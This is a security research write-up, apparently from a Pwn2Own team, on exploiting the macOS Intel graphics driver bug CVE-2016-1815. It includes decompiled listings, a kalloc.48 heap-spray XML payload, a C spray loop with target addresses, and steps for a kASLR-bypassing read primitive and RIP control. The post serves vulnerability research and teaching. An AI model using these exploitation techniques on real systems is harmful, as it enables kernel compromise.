One Rectangle to Pwn the Whole Kernel, Part 1: The Zone Dance
Can a single rectangle pwn the whole kernel? It sounds unbelievable, but it really happened at Pwn2Own in Vancouver in March this year. This series of articles shares how we discovered and exploited Blitzard (CVE-2016-1815), which we used for the sandbox escape. This article first covers the second and third steps of the exploit: the dance of kalloc.48, and kalloc.8192, the heavy sword without an edge. In the last article we will go back to the origin and explain the root cause of the vulnerability.
Take away
We use an out-of-bounds (OOB) access on a vector and, through careful heap layout, turn it into a write primitive with an arbitrary address but constrained values. We then use this primitive to build an infoleak that bypasses kASLR, and finally take control of RIP.
The IGVector::add function
char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
  v3 = ...;
  if ( this->currentSize != this->capacity )
    goto LABEL_4;
  LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
  if ( v4 )
  {
LABEL_4:
    this->currentSize += 1;
    v5 = ...;
    *(this->storage + 32 * this->currentSize + 24) = a2->field_18; // rect2.len, rect2.height
    *(this->storage + 32 * this->currentSize + 16) = a2->field_10; // rect2.y, rect2.x
    *(this->storage + 32 * this->currentSize + 8) = a2->field_8;   // rect1.len, rect1.height
    *(this->storage + 32 * this->currentSize) = a2->field_0;       // rect1.y, rect1.x
  }
  return v4;
}
IGVector is a generic template class used frequently in Apple's graphics drivers. It starts with the currentSize field, followed by the capacity field, which records the maximum capacity of the vector. After that comes the storage pointer, which holds the heap address of the vector's backing store. rect_pair_t is a pair of rectangles, each of which uniquely describes a drawing area on the screen. The fields of a rectangle are as follows:
- int16 x
- int16 y
- int16 w
- int16 h
x and y are the coordinates of a corner of the rectangle, while w and h are its width and height. These four values uniquely determine a rectangle in the coordinate system. The rectangles start out as integers, but after a series of scaling and splitting operations they are converted to IEEE 754 floating-point numbers. The floating-point code made reversing the driver harder, because IDA's F5 decompiler does not recognize and organize SSE floating-point instructions well. It also limits the values that our OOB write can control.
When the OOB occurs, the memory layout is as shown in the following figure. The IGVector::add call operates on a partially out-of-bounds IGVector of size 48. Its size field is pinned to 0xdeadbeefdeadbeef: kalloc.48 elements are smaller than a cache line, so the zone allocator always poisons them after free. Fortunately, capacity and storage are both under our control. If the following conditions are met, we have an arbitrary-address write that spans the whole address space.
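Judging from the add listing above, the two conditions are:
- capacity differs from the current size (0xdeadbeefdeadbeef), so add does not call grow
- storage + 32 * size, computed with 64-bit wraparound, is the address we want to write to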
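The address arithmetic behind such a write can be sketched in a few lines of C. This is only a model based on the decompiled listing above: the 32-byte stride comes from that listing, while the function names, and the question of exactly which index the write uses, are assumptions made for illustration.

```c
#include <stdint.h>

/* Stride between elements: 32 bytes, as in the decompiled add() listing. */
#define RECT_PAIR_STRIDE UINT64_C(32)

/* Address of element `index` in a vector whose storage pointer is `storage`.
 * Unsigned 64-bit arithmetic wraps modulo 2^64, like the pointer math it models. */
static uint64_t slot_address(uint64_t storage, uint64_t index)
{
    return storage + RECT_PAIR_STRIDE * index;
}

/* Hypothetical helper: the storage value that makes element `index`
 * land exactly on `target`. */
static uint64_t storage_for_target(uint64_t target, uint64_t index)
{
    return target - RECT_PAIR_STRIDE * index;
}
```

Because the arithmetic wraps, a fixed and enormous index such as the poison value does not restrict the reachable addresses: for any target there is a storage value that maps onto it.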
But this is still not a primitive that writes arbitrary values. As mentioned earlier, the rectangle fields start out as signed int16 values, that is, in the range [-0x8000, 0x7fff]. By the time the function that triggers the OOB is called, they have already been converted to IEEE 754 floats. This means that each use of the primitive performs four consecutive 8-byte writes, each made of two 4-byte values drawn from 0x3xxxxxxx, 0x4xxxxxxx, 0xcxxxxxxx, 0xdxxxxxxx or 0xbf800000 (the floating-point representation of -1), for 32 bytes written in total.
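To see where such bit patterns come from, the following sketch converts a signed 16-bit value to a single-precision float and returns its raw bits. It assumes the platform's float is IEEE 754 binary32, and it ignores the scaling and splitting that the driver applies before the write, so it only illustrates the encoding, not the exact values the driver produces. The function name is hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Return the raw IEEE 754 single-precision bit pattern of a signed
 * 16-bit coordinate after conversion to float. */
static uint32_t int16_as_float_bits(int16_t v)
{
    float f = (float)v;
    uint32_t bits;
    memcpy(&bits, &f, sizeof bits);   /* copy the bytes instead of casting pointers */
    return bits;
}
```

For example, -1 encodes as 0xbf800000 and 1 as 0x3f800000, both of which fall in the value set listed above.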
This does not look like good news. Still, we first need to make this constrained write reliable, and then show how to use it to complete the exploit.
Controlling zone kalloc.48
As the figure above shows, we need to control the memory content precisely when the overflow happens; otherwise a bad access occurs and the kernel panics. Unfortunately, kalloc.48 is a fairly busy zone in the kernel, and IOMachPort is its most active user. The memory content of an IOMachPort is clearly not controllable, so we need to keep it from interfering.
Historically, the common ways to lay out the kernel heap have been io_open_service_extended and ool_msg. Each has its own advantages and drawbacks:
- ool_msg has few side effects on the heap, but the first 0x18 bytes (the header) are not controllable, and our vulnerability requires precise control of the 8 bytes at offset 0x8
- io_open_service_extended causes huge side effects in kalloc.48, because every spray allocates a new IOMachPort
Here we found and used a new heap spray method: IOCatalogueSendData, shown in the code below. It needs only a master port to spray the heap and has few side effects: energy-saving and eco-friendly.
kern_return_t
IOCatalogueSendData(
        mach_port_t     _masterPort,
        uint32_t        flag,
        const char     *buffer,
        uint32_t        size )
{
    //...
    kr = io_catalog_send_data( masterPort, flag,
                              (char *) buffer, size, &result );
    //...
    if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
        mach_port_deallocate(mach_task_self(), masterPort);
    //...
}
/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
        mach_port_t             master_port,
        uint32_t                flag,
        io_buf_ptr_t            inData,
        mach_msg_type_number_t  inDataCount,
        kern_return_t *         result)
{
    //...
    if (inData) {
        //...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
        // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
            //...
    switch ( flag ) {
        //...
        case kIOCatalogAddDrivers:
        case kIOCatalogAddDriversNoMatch: {
            //...
            array = OSDynamicCast(OSArray, obj);
            if ( array ) {
                if ( !gIOCatalogue->addDrivers( array ,
                                      flag == kIOCatalogAddDrivers) ) {
                    //...
                }
            break;
            //...
}
bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
    //...
    while ( (object = iter->getNextObject()) ) {
        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL
        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
        //...
        // Add driver personality to catalogue.
        OSArray * array = arrayForPersonality(personality);
        if (!array) addPersonality(personality);
        else
        {
            count = array->getCount();
            while (count--) {
                OSDictionary * driver;
                // Be sure not to double up on personalities.
                driver = (OSDictionary *)array->getObject(count);
                //...
                if (personality->isEqualTo(driver)) {
                    break;
                }
            }
            if (count >= 0) {
                // its a dup
                continue;
            }
            result = array->setObject(personality);
            //...
            set->setObject(personality);
        }
        //...
    }
The addDrivers function takes an OSArray as input, which must satisfy the following conditions:
- the OSArray contains an OSDict
- the OSDict contains the key IOProviderClass
- the OSDict must not be identical to an OSDict that already exists in the catalogue
We can prepare our layout payload in the following XML format and send it with IOCatalogueSendData(masterPort, 2, buf, 4096), as many times as we like:
<array>
    <dict>
        <key>IOProviderClass</key>
        <string>ZZZZ</string>
        <key>ZZZZ</key>
        <array>
            <string>AAAAAAAAAAAAAAAAAAAAAA</string>
            <string>AAAAAAAAAAAAAAAAAAAAAB</string>
            ...
            <string>ZZZZZZZZZZZZZZZZZZZZZZ</string>
        </array>
    </dict>
</array>
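The sample payload enumerates fixed-width strings in alphabetical order. One way to generate such names is sketched below. The helper name nth_name and the constant NAME_LEN (set to 22 on the assumption that this matches the width of the sample strings) are illustrative and are not taken from the original exploit code.

```c
#define NAME_LEN 22   /* assumed width of each <string> entry */

/* Write the index-th name into out, which must hold NAME_LEN + 1 bytes.
 * Names are fixed-width base-26 numbers over 'A'..'Z', so index 0 is all
 * 'A', index 1 ends in 'B', and so on. */
static void nth_name(unsigned long index, char out[NAME_LEN + 1])
{
    for (int i = NAME_LEN - 1; i >= 0; i--) {
        out[i] = (char)('A' + index % 26);
        index /= 26;
    }
    out[NAME_LEN] = '\0';
}
```

Each generated name can then be wrapped in a string element when the XML buffer is assembled.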
With this method, the steps for playing in kalloc.48 are:
- spray a combination of vm_map_copy and 50 IOCatalogueSendData allocations (content fully controllable), each of size 0x30
- free 1/3 to 2/3 of the ool_msg allocations to dig holes in the heap
- trigger the vulnerability so that the vulnerable allocation falls into one of the holes
Because we dig enough holes, the heap layout becomes stable and matches our expectations with high probability. This gives us a stable, repeatable arbitrary-address write and completes the first of the three steps.
So what comes next?
Controlling RIP with a float
Once we have a stable write, how do we control RIP? A naive idea is to overwrite the vtable pointer of a userclient directly. However, the limited value range of our write makes this infeasible, as the following figure shows: an address beginning with 0xbf is not a valid address in the kernel.
However, thanks to the x86 MOV instruction, the write does not have to be strictly 8-byte aligned. We can in fact perform a write that is only 4-byte aligned, as the following figure shows:
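The effect of shifting the write by 4 bytes can be modeled on an ordinary byte buffer. The sketch below is an illustration only: it simulates a single 8-byte store of two packed 32-bit values, assumes a little-endian host, and uses hypothetical helper names.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simulate one 8-byte store of two packed 32-bit float patterns at
 * byte offset `offset` in `mem` (lo_bits first, then hi_bits). */
static void store_float_pair(uint8_t *mem, size_t offset,
                             uint32_t lo_bits, uint32_t hi_bits)
{
    memcpy(mem + offset, &lo_bits, 4);
    memcpy(mem + offset + 4, &hi_bits, 4);
}

/* Read back a 64-bit pointer-sized field at byte offset `offset`. */
static uint64_t load_pointer(const uint8_t *mem, size_t offset)
{
    uint64_t p;
    memcpy(&p, mem + offset, sizeof p);
    return p;
}
```

If a pointer field holds 0xffffff80xxxxxxxx, a store at the field's own offset puts a float pattern in the high 4 bytes and destroys the kernel prefix. A store that starts 4 bytes earlier leaves the high 4 bytes intact and replaces only the low 4 bytes, at the cost of clobbering the 4 bytes in front of the field.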
That looks promising, but it is not so simple. Among the many userclients, only RootDomainUserClient has a vtable pointer whose high 4 bytes are 0xffffff80; the vtable pointers of the other userclients have 0xffffff7f as their high 4 bytes. Given how kASLR works, kernel heap addresses can hardly fall in that region. So is overwriting RootDomainUserClient feasible?
Why is the spray so slow?
Because RootDomainUserClient is relatively small, we need to spray a large number of them to have a reasonable chance that one lands at a predicted address. In practice, we found that the spray slowed down as the number of userclients grew. We looked into the relevant code, shown below:
bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
                                      const IORegistryPlane * plane )
{
    OSArray *   links;
    bool        ret;
    bool        needParent;
    //...
    ret = makeLink( parent, kParentSetIndex, plane );

    if( (links = parent->getChildSetReference( plane )))
        needParent = (false == arrayMember( links, this ));
    else
        needParent = true;

    //...
    if( needParent)
        ret &= parent->attachToChild( this, plane );

    return( ret );
We can see that arrayMember performs a linear search over the clients that are already attached. Anyone who has studied algorithms will recognize that the spray as a whole therefore has O(n^2) complexity.
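To get a feel for the quadratic growth, the sketch below counts comparisons under a simplifying assumption: every attach scans all previously attached clients exactly once and finds no match. The function name is illustrative, and the model leaves out every other cost of an attach.

```c
#include <stdint.h>

/* Total number of element comparisons when n clients are attached one
 * by one and each attach first scans the existing list linearly. */
static uint64_t linear_scan_comparisons(uint64_t n)
{
    uint64_t total = 0;
    for (uint64_t existing = 0; existing < n; existing++)
        total += existing;   /* the new client is compared with all earlier ones */
    return total;
}
```

The total is n(n-1)/2, so doubling the number of sprayed clients roughly quadruples the work: 1000 clients cost 499500 comparisons, 2000 clients cost 1999000.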
The code that follows makes things worse. Before a userclient can be opened, it has to attach to its parent, which calls parent->attachToChild:
bool IORegistryEntry::attachToChild( IORegistryEntry * child,
                                     const IORegistryPlane * plane )
{
    OSArray *   links;
    //...

    ret = makeLink( child, kChildSetIndex, plane );
and then:
bool IORegistryEntry::makeLink( IORegistryEntry * to,
                                unsigned int relation,
                                const IORegistryPlane * plane ) const
{
    OSArray *   links;
    bool        result = false;
    //...
        result = arrayMember( links, to );
        if( !result)
            result = links->setObject( to );

    } else {
Here links is an OSArray. setObject inserts the new userclient into the array's storage and, in doing so, calls a time-consuming function:
unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
{
    //...
    newArray = (const OSMetaClassBase **) kalloc_container(newSize);
    if (newArray) {
        oldSize = sizeof(const OSMetaClassBase *) * capacity;

        OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));

        bcopy(array, newArray, oldSize);
        bzero(&newArray[capacity], newSize - oldSize);
        kfree(array, oldSize);
        array = newArray;
The conclusion from all this is that spraying userclients has O(n^2) time complexity. This forces us to pick a large userclient for the heap spray: the MacBook model used in this year's contest has a Core processor with negligible performance, so the exploit would run slower than a snail if we kept hanging on the RootDomainUserClient tree.
IGAccelVideoContext to the rescue
We kept searching for usable userclients that meet the following conditions:
- it must be possible to open and call it from inside the sandbox
- its size must be larger than the page size, the larger the better
IGAccelVideoContext, which occupies two pages, is exactly the savior we were looking for. Nearly all IOAcceleratorFamily2 userclients have a service pointer that points to the IntelAccelerator. In IGAccelVideoContext it is at offset 0x528. We can overwrite the low 4 bytes of this heap pointer so that it points to heap content under our control, and then trigger a virtual call.
RIP control
Although virtual calls are made through service, we cannot hijack a virtual function of service itself, because the header of the vm_map_copy used for the layout is not controllable, as mentioned above. The context_finish interface, however, indirectly calls a virtual function on service->mEventMachine, which is exactly what we need.
__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1;
  unsigned int v2;
  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,
         //...
Now let's change direction and overwrite the service field of some IGAccelVideoContext. Without knowing the exact heap address, we have to keep spraying. The steps are as follows:
- spray 0x50000 ool_msgs, pushing the heap up to 0xffffff80bf800000 (address B)
- free some in the middle and spray IGAccelVideoContext, making sure that the address in between, A = 0xffffff8062388000, is occupied by one of them
- trigger the vulnerability to write at A - 4 + 0x528, changing the service pointer to 0xffffff80bf800000 (address B)
- call an external method on each of the sprayed userclients to detect the corruption
Why choose A and B, which look like magic numbers? As mentioned earlier, we can only write floats in specific ranges. For example, we can turn 0xffffff80deadbeef into 0xffffff803xxxxxxx, 0xffffff804xxxxxxx, 0xffffff80cxxxxxxx, 0xffffff80dxxxxxxx or 0xffffff80bf800000. Most of these addresses are either too low (kslide changes on every boot, and a high slide pushes the heap base up to 0xffffff804xxxxxxx) or too high (not enough memory, and the spray takes too long). So in the end we chose to write 0xbf800000, and A sits about halfway up to it.
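The constraint on the low 4 bytes can be written down as a small predicate. The sketch below takes the value ranges named in this article at face value (leading hex digit 3, 4, c or d, or exactly 0xbf800000); it is not an exact description of every float the driver can produce, and the function name is hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* True if `v` belongs to the set of 4-byte values that the article
 * describes as writable with the constrained primitive. */
static bool is_writable_dword(uint32_t v)
{
    if (v == 0xbf800000u)          /* float -1.0 */
        return true;
    switch (v >> 28) {             /* leading hex digit */
    case 0x3: case 0x4: case 0xc: case 0xd:
        return true;
    default:
        return false;
    }
}
```

Under this model the low half of B (0xbf800000) is writable while the low half of A (0x62388000) is not, which matches the roles the two addresses play: B is the value that gets written, and A is only a place that gets occupied by spraying.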
In code, the steps look like this:
mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
// plant the same value at two offsets that are 0x1000 apart
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

// spray 0x500 ool messages of size 0x2000
for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n", i, send_msg(buf, size, &my_port[i]));
}

// receive the messages in the middle to release them
for (int i = 0x130; i < 0x250; i++) {
    read_kern_data(my_port[i]);
}

// fill the holes with userclients
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i = 0; i < 0x12000; i++) {
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i, kernResult);
}
The following figure makes this clearer.
So is that all? Not yet.
Head or middle?
Sharp readers may already have a question: each sprayed object is 0x2000 bytes, so how can we guarantee that A falls exactly at the head of a sprayed userclient? It might land in the middle.
Indeed it might. To cover both cases, we write to both A - 4 + 0x528 and A - 4 + 0x528 + 0x1000.
Bypassing kASLR
So what about kASLR? We now know that address A is occupied by an IGAccelVideoContext and address B by a vm_map_copy. Since we have made the service pointer of a userclient point to our fake layout, is there an interface on the userclient that returns the content of some address? Searching turned up get_hw_steppings:
__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service;
  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}
Pay attention to this line:
a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
Recall that service + 0x1288 is under our control, so this is a perfect arbitrary-address read primitive. We take the following steps:
- fill B with a vm_map_copy
- trigger the vulnerability to overwrite the service pointer with B, so that it points to a vm_map_copy filled with 0x41 bytes (except at offset 0x1288, which is set to A - 0xd0)
- call get_hw_steppings and look for 0x41414141 in the result; a userclient that returns it is the one we modified
- a2[4] then returns one byte at address A; repeat the steps above to read the rest
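The read primitive can be modeled on a toy address space to show why the planted pointer must be the target address minus 0xd0. Everything in the sketch below except the two offsets, which come from the get_hw_steppings listing, is a hypothetical construction for illustration.

```c
#include <stdint.h>
#include <string.h>

#define OFF_PTR  0x1288u  /* offset of the pointer that get_hw_steppings loads */
#define OFF_BYTE 0xD0u    /* displacement added before the byte load */

/* A toy address space: `bytes` is the memory that starts at address `base`. */
struct toy_mem { uint64_t base; const uint8_t *bytes; };

static uint8_t toy_read8(const struct toy_mem *m, uint64_t addr)
{
    return m->bytes[addr - m->base];
}

static uint64_t toy_read64(const struct toy_mem *m, uint64_t addr)
{
    uint64_t v;
    memcpy(&v, m->bytes + (addr - m->base), sizeof v);
    return v;
}

/* Models a2[4] = *(uint8_t *)(*(uint64_t *)(service + 0x1288) + 0xD0). */
static uint8_t leaked_byte(const struct toy_mem *m, uint64_t service)
{
    return toy_read8(m, toy_read64(m, service + OFF_PTR) + OFF_BYTE);
}

/* Value to plant at service + 0x1288 so that leaked_byte() returns *target. */
static uint64_t pointer_for_target(uint64_t target)
{
    return target - OFF_BYTE;
}
```

Each call leaks a single byte, so reading a longer range means planting a new pointer value and repeating the call once per byte.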
The figure below makes this clearer.
Head or middle
Sharp readers will notice that B, just like A, may also fall in the middle of a vm_map_copy. We handle B the same way: we set both offset 0x1288 and offset 0x288 to A - 0xd0. If what we read is the 0x1000 offset of a normal IGAccelVideoContext, the value there is 0, which is characteristic of that object.
This lets us tell head from tail with at most two attempts, as the figure below shows. In the end we achieve an arbitrary-address leak.
Summary
The video of this attack can be found at http://v.qq.com/x/page/f0196p3g7vq.html.
So what exactly is this magical rectangle vulnerability? The exploit is this complex, so what about the bug itself? Stay tuned for the following articles. If you can't wait, please see our slides from Black Hat USA.